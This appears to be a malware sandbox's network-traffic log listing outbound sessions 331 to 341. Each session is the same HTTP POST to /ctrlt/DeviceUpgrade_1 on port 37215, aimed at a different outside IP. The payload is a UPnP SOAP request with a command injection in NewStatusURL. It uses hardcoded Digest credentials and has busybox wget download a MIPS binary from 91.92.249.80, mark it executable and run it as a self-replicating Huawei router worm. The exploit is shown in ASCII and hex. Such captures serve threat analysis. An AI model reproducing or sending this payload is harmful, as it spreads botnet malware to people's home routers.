                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          331192.168.2.2345120157.45.146.11037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177309990 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          332192.168.2.2350394197.181.11.7237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177494049 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          333192.168.2.234886041.113.55.20937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177494049 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          334192.168.2.2343764197.118.231.17737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177510023 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          335192.168.2.2344122109.13.72.3437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177516937 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          336192.168.2.2343348157.245.90.22537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177525997 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          337192.168.2.233384641.104.167.20837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177546978 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          338192.168.2.233968241.1.146.15237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177550077 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          339192.168.2.234638041.67.63.1637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177994967 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          340192.168.2.2348840126.59.156.19937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177994967 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          341192.168.2.2345674157.205.176.25237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178030014 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
